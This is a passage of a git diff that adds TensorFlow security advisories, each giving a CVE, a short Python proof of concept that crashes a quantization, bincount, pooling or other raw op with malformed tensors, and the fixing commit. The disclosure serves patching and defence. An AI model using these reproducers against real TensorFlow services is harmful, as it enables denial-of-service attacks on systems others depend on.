+x_min = tf.constant([], shape=[0], dtype=tf.float32)
+x_max = tf.constant(0, shape=[], dtype=tf.float32)
+tf.raw_ops.QuantizedInstanceNorm(x=x, x_min=x_min, x_max=x_max, output_range_given=output_range_given, given_y_min=given_y_min, given_y_max=given_y_max, variance_epsilon=variance_epsilon, min_separation=min_separation)
+```
+
+### Patches
+We have patched the issue in GitHub commit [785d67a78a1d533759fcd2f5e8d6ef778de849e0](https://github.com/tensorflow/tensorflow/commit/785d67a78a1d533759fcd2f5e8d6ef778de849e0).
+
+The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range.
+
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+
+### Attribution
+This vulnerability has been reported by Neophytos Christou, Secure Systems Labs, Brown University.
diff --git a/tensorflow/security/advisory/tfsa-2022-103.md b/tensorflow/security/advisory/tfsa-2022-103.md
new file mode 100644
index 0000000..6260a8e
--- /dev/null
+++ b/tensorflow/security/advisory/tfsa-2022-103.md
@@ -0,0 +1,32 @@
+## TFSA-2022-103: `CHECK` fail in `FakeQuantWithMinMaxVars`
+
+### CVE Number
+CVE-2022-35971
+
+### Impact
+If `FakeQuantWithMinMaxVars` is given `min` or `max` tensors of a nonzero rank, it results in a `CHECK` fail that can be used to trigger a denial of service attack.
+```python
+import tensorflow as tf
+
+num_bits = 8
+narrow_range = False
+inputs = tf.constant(0, shape=[2,3], dtype=tf.float32)
+min = tf.constant(0, shape=[2,3], dtype=tf.float32)
+max = tf.constant(0, shape=[2,3], dtype=tf.float32)
+tf.raw_ops.FakeQuantWithMinMaxVars(inputs=inputs, min=min, max=max, num_bits=num_bits, narrow_range=narrow_range)
+```
+
+### Patches
+We have patched the issue in GitHub commit [785d67a78a1d533759fcd2f5e8d6ef778de849e0](https://github.com/tensorflow/tensorflow/commit/785d67a78a1d533759fcd2f5e8d6ef778de849e0).
+
+The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range.
+
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+
+### Attribution
+This vulnerability has been reported by:
+ - Neophytos Christou, Secure Systems Labs, Brown University.
+ - 刘力源, Information System & Security and Countermeasures Experiments Center, Beijing Institute of Technology
diff --git a/tensorflow/security/advisory/tfsa-2022-104.md b/tensorflow/security/advisory/tfsa-2022-104.md
new file mode 100644
index 0000000..1b1bc12
--- /dev/null
+++ b/tensorflow/security/advisory/tfsa-2022-104.md
@@ -0,0 +1,31 @@
+## TFSA-2022-104: Segfault in `Requantize`
+
+### CVE Number
+CVE-2022-36017
+
+### Impact
+If `Requantize` is given `input_min`, `input_max`, `requested_output_min`, `requested_output_max` tensors of a nonzero rank, it results in a segfault that can be used to trigger a denial of service attack.
+```python
+import tensorflow as tf
+
+out_type = tf.quint8
+input = tf.constant([1], shape=[3], dtype=tf.qint32)
+input_min = tf.constant([], shape=[0], dtype=tf.float32)
+input_max = tf.constant(-256, shape=[1], dtype=tf.float32)
+requested_output_min = tf.constant(-256, shape=[1], dtype=tf.float32)
+requested_output_max = tf.constant(-256, shape=[1], dtype=tf.float32)
+tf.raw_ops.Requantize(input=input, input_min=input_min, input_max=input_max, requested_output_min=requested_output_min, requested_output_max=requested_output_max, out_type=out_type)
+```
+
+### Patches
+We have patched the issue in GitHub commit [785d67a78a1d533759fcd2f5e8d6ef778de849e0](https://github.com/tensorflow/tensorflow/commit/785d67a78a1d533759fcd2f5e8d6ef778de849e0).
+
+The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range.
+
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+
+### Attribution
+This vulnerability has been reported by Neophytos Christou, Secure Systems Labs, Brown University.
diff --git a/tensorflow/security/advisory/tfsa-2022-105.md b/tensorflow/security/advisory/tfsa-2022-105.md
new file mode 100644
index 0000000..c4f540e
--- /dev/null
+++ b/tensorflow/security/advisory/tfsa-2022-105.md
@@ -0,0 +1,32 @@
+## TFSA-2022-105: Segfault in `QuantizedBiasAdd`
+
+### CVE Number
+CVE-2022-35972
+
+### Impact
+If `QuantizedBiasAdd` is given `min_input`, `max_input`, `min_bias`, `max_bias` tensors of a nonzero rank, it results in a segfault that can be used to trigger a denial of service attack.
+```python
+import tensorflow as tf
+
+out_type = tf.qint32
+input = tf.constant([85,170,255], shape=[3], dtype=tf.quint8)
+bias = tf.constant(43, shape=[2,3], dtype=tf.quint8)
+min_input = tf.constant([], shape=[0], dtype=tf.float32)
+max_input = tf.constant(0, shape=[1], dtype=tf.float32)
+min_bias = tf.constant(0, shape=[1], dtype=tf.float32)
+max_bias = tf.constant(0, shape=[1], dtype=tf.float32)
+tf.raw_ops.QuantizedBiasAdd(input=input, bias=bias, min_input=min_input, max_input=max_input, min_bias=min_bias, max_bias=max_bias, out_type=out_type)
+```
+
+### Patches
+We have patched the issue in GitHub commit [785d67a78a1d533759fcd2f5e8d6ef778de849e0](https://github.com/tensorflow/tensorflow/commit/785d67a78a1d533759fcd2f5e8d6ef778de849e0).
+
+The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range.
+
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+
+### Attribution
+This vulnerability has been reported by Neophytos Christou, Secure Systems Labs, Brown University.
diff --git a/tensorflow/security/advisory/tfsa-2022-106.md b/tensorflow/security/advisory/tfsa-2022-106.md
new file mode 100644
index 0000000..189a6f3
--- /dev/null
+++ b/tensorflow/security/advisory/tfsa-2022-106.md
@@ -0,0 +1,30 @@
+## TFSA-2022-106: `CHECK` fail in `FakeQuantWithMinMaxVarsPerChannel`
+
+### CVE Number
+CVE-2022-36019
+
+### Impact
+If `FakeQuantWithMinMaxVarsPerChannel` is given `min` or `max` tensors of a rank other than one, it results in a `CHECK` fail that can be used to trigger a denial of service attack.
+```python
+import tensorflow as tf
+
+num_bits = 8
+narrow_range = False
+inputs = tf.constant(0, shape=[4], dtype=tf.float32)
+min = tf.constant([], shape=[4,0,0], dtype=tf.float32)
+max = tf.constant(0, shape=[4], dtype=tf.float32)
+tf.raw_ops.FakeQuantWithMinMaxVarsPerChannel(inputs=inputs, min=min, max=max, num_bits=num_bits, narrow_range=narrow_range)
+```
+
+### Patches
+We have patched the issue in GitHub commit [785d67a78a1d533759fcd2f5e8d6ef778de849e0](https://github.com/tensorflow/tensorflow/commit/785d67a78a1d533759fcd2f5e8d6ef778de849e0).
+
+The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range.
+
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+
+### Attribution
+This vulnerability has been reported by Neophytos Christou, Secure Systems Labs, Brown University.
diff --git a/tensorflow/security/advisory/tfsa-2022-107.md b/tensorflow/security/advisory/tfsa-2022-107.md
new file mode 100644
index 0000000..e4632ca
--- /dev/null
+++ b/tensorflow/security/advisory/tfsa-2022-107.md
@@ -0,0 +1,40 @@
+## TFSA-2022-107: Segfault in `QuantizedMatMul`
+
+### CVE Number
+CVE-2022-35973
+
+### Impact
+If `QuantizedMatMul` is given nonscalar input for:
+ - `min_a`
+ - `max_a`
+ - `min_b`
+ - `max_b`
+It gives a segfault that can be used to trigger a denial of service attack.
+```python
+import tensorflow as tf
+
+Toutput = tf.qint32
+transpose_a = False
+transpose_b = False
+Tactivation = tf.quint8
+a = tf.constant(7, shape=[3,4], dtype=tf.quint8)
+b = tf.constant(1, shape=[2,3], dtype=tf.quint8)
+min_a = tf.constant([], shape=[0], dtype=tf.float32)
+max_a = tf.constant(0, shape=[1], dtype=tf.float32)
+min_b = tf.constant(0, shape=[1], dtype=tf.float32)
+max_b = tf.constant(0, shape=[1], dtype=tf.float32)
+tf.raw_ops.QuantizedMatMul(a=a, b=b, min_a=min_a, max_a=max_a, min_b=min_b, max_b=max_b, Toutput=Toutput, transpose_a=transpose_a, transpose_b=transpose_b, Tactivation=Tactivation)
+```
+
+### Patches
+We have patched the issue in GitHub commit [aca766ac7693bf29ed0df55ad6bfcc78f35e7f48](https://github.com/tensorflow/tensorflow/commit/aca766ac7693bf29ed0df55ad6bfcc78f35e7f48).
+
+The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range.
+
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+
+### Attribution
+This vulnerability has been reported by Neophytos Christou, Secure Systems Labs, Brown University.
diff --git a/tensorflow/security/advisory/tfsa-2022-108.md b/tensorflow/security/advisory/tfsa-2022-108.md
new file mode 100644
index 0000000..5a322d7
--- /dev/null
+++ b/tensorflow/security/advisory/tfsa-2022-108.md
@@ -0,0 +1,29 @@
+## TFSA-2022-108: Segfault in `QuantizeDownAndShrinkRange`
+
+### CVE Number
+CVE-2022-35974
+
+### Impact
+If `QuantizeDownAndShrinkRange` is given nonscalar inputs for `input_min` or `input_max`, it results in a segfault that can be used to trigger a denial of service attack.
+```python
+import tensorflow as tf
+
+out_type = tf.quint8
+input = tf.constant([1], shape=[3], dtype=tf.qint32)
+input_min = tf.constant([], shape=[0], dtype=tf.float32)
+input_max = tf.constant(-256, shape=[1], dtype=tf.float32)
+tf.raw_ops.QuantizeDownAndShrinkRange(input=input, input_min=input_min, input_max=input_max, out_type=out_type)
+```
+
+### Patches
+We have patched the issue in GitHub commit [73ad1815ebcfeb7c051f9c2f7ab5024380ca8613](https://github.com/tensorflow/tensorflow/commit/73ad1815ebcfeb7c051f9c2f7ab5024380ca8613).
+
+The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range.
+
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+
+### Attribution
+This vulnerability has been reported by Neophytos Christou, Secure Systems Labs, Brown University.
diff --git a/tensorflow/security/advisory/tfsa-2022-109.md b/tensorflow/security/advisory/tfsa-2022-109.md
new file mode 100644
index 0000000..b15b417
--- /dev/null
+++ b/tensorflow/security/advisory/tfsa-2022-109.md
@@ -0,0 +1,30 @@
+## TFSA-2022-109: Segfault in `QuantizedRelu` and `QuantizedRelu6`
+
+### CVE Number
+CVE-2022-35979
+
+### Impact
+If `QuantizedRelu` or `QuantizedRelu6` are given nonscalar inputs for `min_features` or `max_features`, it results in a segfault that can be used to trigger a denial of service attack.
+```python
+import tensorflow as tf
+
+out_type = tf.quint8
+features = tf.constant(28, shape=[4,2], dtype=tf.quint8)
+min_features = tf.constant([], shape=[0], dtype=tf.float32)
+max_features = tf.constant(-128, shape=[1], dtype=tf.float32)
+tf.raw_ops.QuantizedRelu(features=features, min_features=min_features, max_features=max_features, out_type=out_type)
+tf.raw_ops.QuantizedRelu6(features=features, min_features=min_features, max_features=max_features, out_type=out_type)
+```
+
+### Patches
+We have patched the issue in GitHub commit [49b3824d83af706df0ad07e4e677d88659756d89](https://github.com/tensorflow/tensorflow/commit/49b3824d83af706df0ad07e4e677d88659756d89).
+
+The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range.
+
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+
+### Attribution
+This vulnerability has been reported by Neophytos Christou, Secure Systems Labs, Brown University.
diff --git a/tensorflow/security/advisory/tfsa-2022-110.md b/tensorflow/security/advisory/tfsa-2022-110.md
new file mode 100644
index 0000000..e90f625
--- /dev/null
+++ b/tensorflow/security/advisory/tfsa-2022-110.md
@@ -0,0 +1,31 @@
+## TFSA-2022-110: `CHECK` fail in `FractionalMaxPoolGrad`
+
+### CVE Number
+CVE-2022-35981
+
+### Impact
+`FractionalMaxPoolGrad` validates its inputs with `CHECK` failures instead of with returning errors. If it gets incorrectly sized inputs, the `CHECK` failure can be used to trigger a denial of service attack:
+```python
+import tensorflow as tf
+
+overlapping = True
+orig_input = tf.constant(.453409232, shape=[1,7,13,1], dtype=tf.float32)
+orig_output = tf.constant(.453409232, shape=[1,7,13,1], dtype=tf.float32)
+out_backprop = tf.constant(.453409232, shape=[1,7,13,1], dtype=tf.float32)
+row_pooling_sequence = tf.constant(0, shape=[5], dtype=tf.int64)
+col_pooling_sequence = tf.constant(0, shape=[5], dtype=tf.int64)
+tf.raw_ops.FractionalMaxPoolGrad(orig_input=orig_input, orig_output=orig_output, out_backprop=out_backprop, row_pooling_sequence=row_pooling_sequence, col_pooling_sequence=col_pooling_sequence, overlapping=overlapping)
+```
+
+### Patches
+We have patched the issue in GitHub commit [8741e57d163a079db05a7107a7609af70931def4](https://github.com/tensorflow/tensorflow/commit/8741e57d163a079db05a7107a7609af70931def4).
+
+The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range.
+
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+
+### Attribution
+This vulnerability has been reported by Neophytos Christou, Secure Systems Labs, Brown University.
diff --git a/tensorflow/security/advisory/tfsa-2022-111.md b/tensorflow/security/advisory/tfsa-2022-111.md
new file mode 100644
index 0000000..6b9b115
--- /dev/null
+++ b/tensorflow/security/advisory/tfsa-2022-111.md
@@ -0,0 +1,28 @@
+## TFSA-2022-111: `CHECK` fail in `RaggedTensorToVariant`
+
+### CVE Number
+CVE-2022-36018
+
+### Impact
+If `RaggedTensorToVariant` is given a `rt_nested_splits` list that contains tensors of ranks other than one, it results in a `CHECK` fail that can be used to trigger a denial of service attack.
+```python
+import tensorflow as tf
+
+batched_input = True
+rt_nested_splits = tf.constant([0,32,64], shape=[3], dtype=tf.int64)
+rt_dense_values = tf.constant([0,32,64], shape=[3], dtype=tf.int64)
+tf.raw_ops.RaggedTensorToVariant(rt_nested_splits=rt_nested_splits, rt_dense_values=rt_dense_values, batched_input=batched_input)
+```
+
+### Patches
+We have patched the issue in GitHub commit [88f93dfe691563baa4ae1e80ccde2d5c7a143821](https://github.com/tensorflow/tensorflow/commit/88f93dfe691563baa4ae1e80ccde2d5c7a143821).
+
+The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range.
+
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+
+### Attribution
+This vulnerability has been reported by Neophytos Christou, Secure Systems Labs, Brown University.
diff --git a/tensorflow/security/advisory/tfsa-2022-112.md b/tensorflow/security/advisory/tfsa-2022-112.md
new file mode 100644
index 0000000..c0259a6
--- /dev/null
+++ b/tensorflow/security/advisory/tfsa-2022-112.md
@@ -0,0 +1,33 @@
+## TFSA-2022-112: `CHECK` fail in `QuantizeAndDequantizeV3`
+
+### CVE Number
+CVE-2022-36026
+
+### Impact
+If `QuantizeAndDequantizeV3` is given a nonscalar `num_bits` input tensor, it results in a `CHECK` fail that can be used to trigger a denial of service attack.
+```python
+import tensorflow as tf
+
+signed_input = True
+range_given = False
+narrow_range = False
+axis = -1
+input = tf.constant(-3.5, shape=[1], dtype=tf.float32)
+input_min = tf.constant(-3.5, shape=[1], dtype=tf.float32)
+input_max = tf.constant(-3.5, shape=[1], dtype=tf.float32)
+num_bits = tf.constant([], shape=[0], dtype=tf.int32)
+tf.raw_ops.QuantizeAndDequantizeV3(input=input, input_min=input_min, input_max=input_max, num_bits=num_bits, signed_input=signed_input, range_given=range_given, narrow_range=narrow_range, axis=axis)
+```
+
+### Patches
+We have patched the issue in GitHub commit [f3f9cb38ecfe5a8a703f2c4a8fead434ef291713](https://github.com/tensorflow/tensorflow/commit/f3f9cb38ecfe5a8a703f2c4a8fead434ef291713).
+
+The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range.
+
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+
+### Attribution
+This vulnerability has been reported by Neophytos Christou, Secure Systems Labs, Brown University.
diff --git a/tensorflow/security/advisory/tfsa-2022-113.md b/tensorflow/security/advisory/tfsa-2022-113.md
new file mode 100644
index 0000000..207aa8e
--- /dev/null
+++ b/tensorflow/security/advisory/tfsa-2022-113.md
@@ -0,0 +1,30 @@
+## TFSA-2022-113: Segfault in `SparseBincount`
+
+### CVE Number
+CVE-2022-35982
+
+### Impact
+If `SparseBincount` is given inputs for `indices`, `values`, and `dense_shape` that do not make a valid sparse tensor, it results in a segfault that can be used to trigger a denial of service attack.
+```python
+import tensorflow as tf
+binary_output = True
+indices = tf.random.uniform(shape=[], minval=-10000, maxval=10000, dtype=tf.int64, seed=-1288)
+values = tf.random.uniform(shape=[], minval=-10000, maxval=10000, dtype=tf.int32, seed=-9366)
+dense_shape = tf.random.uniform(shape=[0], minval=-10000, maxval=10000, dtype=tf.int64, seed=-9878)
+size = tf.random.uniform(shape=[], minval=-10000, maxval=10000, dtype=tf.int32, seed=-10000)
+weights = tf.random.uniform(shape=[], minval=-10000, maxval=10000, dtype=tf.float32, seed=-10000)
+tf.raw_ops.SparseBincount(indices=indices, values=values, dense_shape=dense_shape, size=size, weights=weights, binary_output=binary_output)
+```
+
+### Patches
+We have patched the issue in GitHub commit [40adbe4dd15b582b0210dfbf40c243a62f5119fa](https://github.com/tensorflow/tensorflow/commit/40adbe4dd15b582b0210dfbf40c243a62f5119fa).
+
+The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range.
+
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+
+### Attribution
+This vulnerability has been reported by Di Jin, Secure Systems Labs, Brown University
diff --git a/tensorflow/security/advisory/tfsa-2022-114.md b/tensorflow/security/advisory/tfsa-2022-114.md
new file mode 100644
index 0000000..97a03c0
--- /dev/null
+++ b/tensorflow/security/advisory/tfsa-2022-114.md
@@ -0,0 +1,32 @@
+## TFSA-2022-114: `CHECK` fail in `Save` and `SaveSlices`
+
+### CVE Number
+CVE-2022-35983
+
+### Impact
+If `Save` or `SaveSlices` is run over tensors of an unsupported `dtype`, it results in a `CHECK` fail that can be used to trigger a denial of service attack.
+```python
+import tensorflow as tf
+filename = tf.constant("")
+tensor_names = tf.constant("")
+# Save
+data = tf.cast(tf.random.uniform(shape=[1], minval=-10000, maxval=10000, dtype=tf.int64, seed=-2021), tf.uint64)
+tf.raw_ops.Save(filename=filename, tensor_names=tensor_names, data=data, )
+# SaveSlices
+shapes_and_slices = tf.constant("")
+data = tf.cast(tf.random.uniform(shape=[1], minval=-10000, maxval=10000, dtype=tf.int64, seed=9712), tf.uint32)
+tf.raw_ops.SaveSlices(filename=filename, tensor_names=tensor_names, shapes_and_slices=shapes_and_slices, data=data, )
+```
+
+### Patches
+We have patched the issue in GitHub commit [5dd7b86b84a864b834c6fa3d7f9f51c87efa99d4](https://github.com/tensorflow/tensorflow/commit/5dd7b86b84a864b834c6fa3d7f9f51c87efa99d4).
+
+The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range.
+
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+
+### Attribution
+This vulnerability has been reported by Di Jin, Secure Systems Labs, Brown University
diff --git a/tensorflow/security/advisory/tfsa-2022-115.md b/tensorflow/security/advisory/tfsa-2022-115.md
new file mode 100644
index 0000000..7b92a4c
--- /dev/null
+++ b/tensorflow/security/advisory/tfsa-2022-115.md
@@ -0,0 +1,31 @@
+## TFSA-2022-115: `CHECK` fail in `ParameterizedTruncatedNormal`
+
+### CVE Number
+CVE-2022-35984
+
+### Impact
+`ParameterizedTruncatedNormal` assumes `shape` is of type `int32`. A valid `shape` of type `int64` results in a mismatched type `CHECK` fail that can be used to trigger a denial of service attack.
+```python
+import tensorflow as tf
+seed = 1618
+seed2 = 0
+shape = tf.random.uniform(shape=[3], minval=-10000, maxval=10000, dtype=tf.int64, seed=4894)
+means = tf.random.uniform(shape=[3, 3, 3], minval=-10000, maxval=10000, dtype=tf.float32, seed=-2971)
+stdevs = tf.random.uniform(shape=[3, 3, 3], minval=-10000, maxval=10000, dtype=tf.float32, seed=-2971)
+minvals = tf.random.uniform(shape=[3, 3, 3], minval=-10000, maxval=10000, dtype=tf.float32, seed=-2971)
+maxvals = tf.random.uniform(shape=[3, 3, 3], minval=-10000, maxval=10000, dtype=tf.float32, seed=-2971)
+tf.raw_ops.ParameterizedTruncatedNormal(shape=shape, means=means, stdevs=stdevs, minvals=minvals, maxvals=maxvals, seed=seed, seed2=seed2)
+```
+
+### Patches
+We have patched the issue in GitHub commit [72180be03447a10810edca700cbc9af690dfeb51](https://github.com/tensorflow/tensorflow/commit/72180be03447a10810edca700cbc9af690dfeb51).
+
+The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range.
+
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+
+### Attribution
+This vulnerability has been reported by Di Jin, Secure Systems Labs, Brown University
diff --git a/tensorflow/security/advisory/tfsa-2022-116.md b/tensorflow/security/advisory/tfsa-2022-116.md
new file mode 100644
index 0000000..8677dfe
--- /dev/null
+++ b/tensorflow/security/advisory/tfsa-2022-116.md
@@ -0,0 +1,31 @@
+## TFSA-2022-116: `CHECK` fail in `LRNGrad`
+
+### CVE Number
+CVE-2022-35985
+
+### Impact
+If `LRNGrad` is given an `output_image` input tensor that is not 4-D, it results in a `CHECK` fail that can be used to trigger a denial of service attack.
+```python
+import tensorflow as tf
+depth_radius = 1
+bias = 1.59018219
+alpha = 0.117728651
+beta = 0.404427052
+input_grads = tf.random.uniform(shape=[4, 4, 4, 4], minval=-10000, maxval=10000, dtype=tf.float32, seed=-2033)
+input_image = tf.random.uniform(shape=[4, 4, 4, 4], minval=-10000, maxval=10000, dtype=tf.float32, seed=-2033)
+output_image = tf.random.uniform(shape=[4, 4, 4, 4, 4, 4], minval=-10000, maxval=10000, dtype=tf.float32, seed=-2033)
+tf.raw_ops.LRNGrad(input_grads=input_grads, input_image=input_image, output_image=output_image, depth_radius=depth_radius, bias=bias, alpha=alpha, beta=beta)
+```
+
+### Patches
+We have patched the issue in GitHub commit [bd90b3efab4ec958b228cd7cfe9125be1c0cf255](https://github.com/tensorflow/tensorflow/commit/bd90b3efab4ec958b228cd7cfe9125be1c0cf255).
+
+The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range.
+
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+
+### Attribution
+This vulnerability has been reported by Di Jin, Secure Systems Labs, Brown University
diff --git a/tensorflow/security/advisory/tfsa-2022-117.md b/tensorflow/security/advisory/tfsa-2022-117.md
new file mode 100644
index 0000000..d841f1e
--- /dev/null
+++ b/tensorflow/security/advisory/tfsa-2022-117.md
@@ -0,0 +1,29 @@
+## TFSA-2022-117: Segfault in `RaggedBincount`
+
+### CVE Number
+CVE-2022-35986
+
+### Impact
+If `RaggedBincount` is given an empty input tensor `splits`, it results in a segfault that can be used to trigger a denial of service attack.
+```python
+import tensorflow as tf
+binary_output = True
+splits = tf.random.uniform(shape=[0], minval=-10000, maxval=10000, dtype=tf.int64, seed=-7430)
+values = tf.random.uniform(shape=[], minval=-10000, maxval=10000, dtype=tf.int32, seed=-10000)
+size = tf.random.uniform(shape=[], minval=-10000, maxval=10000, dtype=tf.int32, seed=-10000)
+weights = tf.random.uniform(shape=[], minval=-10000, maxval=10000, dtype=tf.float32, seed=-10000)
+tf.raw_ops.RaggedBincount(splits=splits, values=values, size=size, weights=weights, binary_output=binary_output)
+```
+
+### Patches
+We have patched the issue in GitHub commit [7a4591fd4f065f4fa903593bc39b2f79530a74b8](https://github.com/tensorflow/tensorflow/commit/7a4591fd4f065f4fa903593bc39b2f79530a74b8).
+
+The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range.
+
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+
+### Attribution
+This vulnerability has been reported by Di Jin, Secure Systems Labs, Brown University
diff --git a/tensorflow/security/advisory/tfsa-2022-118.md b/tensorflow/security/advisory/tfsa-2022-118.md
new file mode 100644
index 0000000..4c39d1f
--- /dev/null
+++ b/tensorflow/security/advisory/tfsa-2022-118.md
@@ -0,0 +1,28 @@
+## TFSA-2022-118: `CHECK` fail in `DenseBincount`
+
+### CVE Number
+CVE-2022-35987
+
+### Impact
+`DenseBincount` assumes its input tensor `weights` to either have the same shape as its input tensor `input` or to be length-0. A different `weights` shape will trigger a `CHECK` fail that can be used to trigger a denial of service attack.
+```python
+import tensorflow as tf
+binary_output = True
+input = tf.random.uniform(shape=[0, 0], minval=-10000, maxval=10000, dtype=tf.int32, seed=-2460)
+size = tf.random.uniform(shape=[], minval=-10000, maxval=10000, dtype=tf.int32, seed=-10000)
+weights = tf.random.uniform(shape=[], minval=-10000, maxval=10000, dtype=tf.float32, seed=-10000)
+tf.raw_ops.DenseBincount(input=input, size=size, weights=weights, binary_output=binary_output)
+```
+
+### Patches
+We have patched the issue in GitHub commit [bf4c14353c2328636a18bfad1e151052c81d5f43](https://github.com/tensorflow/tensorflow/commit/bf4c14353c2328636a18bfad1e151052c81d5f43).
+
+The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range.
+
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+
+### Attribution
+This vulnerability has been reported by Di Jin, Secure Systems Labs, Brown University
diff --git a/tensorflow/security/advisory/tfsa-2022-119.md b/tensorflow/security/advisory/tfsa-2022-119.md
new file mode 100644
index 0000000..987016e
--- /dev/null
+++ b/tensorflow/security/advisory/tfsa-2022-119.md
@@ -0,0 +1,26 @@
+## TFSA-2022-119: `CHECK` fail in `tf.linalg.matrix_rank`
+
+### CVE Number
+CVE-2022-35988
+
+### Impact
+When `tf.linalg.matrix_rank` receives an empty input `a`, the GPU kernel gives a `CHECK` fail that can be used to trigger a denial of service attack.
+```python
+import tensorflow as tf
+
+a = tf.constant([], shape=[0, 1, 1], dtype=tf.float32)
+tf.linalg.matrix_rank(a=a)
+```
+
+### Patches
+We have patched the issue in GitHub commit [c55b476aa0e0bd4ee99d0f3ad18d9d706cd1260a](https://github.com/tensorflow/tensorflow/commit/c55b476aa0e0bd4ee99d0f3ad18d9d706cd1260a).
+
+The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range.
+
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+
+### Attribution
+This vulnerability has been reported by Kang Hong Jin.
diff --git a/tensorflow/security/advisory/tfsa-2022-120.md b/tensorflow/security/advisory/tfsa-2022-120.md
new file mode 100644
index 0000000..50b8239
--- /dev/null
+++ b/tensorflow/security/advisory/tfsa-2022-120.md
@@ -0,0 +1,32 @@
+## TFSA-2022-120: `CHECK` fail in `MaxPool`
+
+### CVE Number
+CVE-2022-35989
+
+### Impact
+When `MaxPool` receives a window size input array `ksize` with dimensions greater than its input tensor `input`, the GPU kernel gives a `CHECK` fail that can be used to trigger a denial of service attack.
+```python
+import tensorflow as tf
+import numpy as np
+
+input = np.ones([1, 1, 1, 1])
+ksize = [1, 1, 2, 2]
+strides = [1, 1, 1, 1]
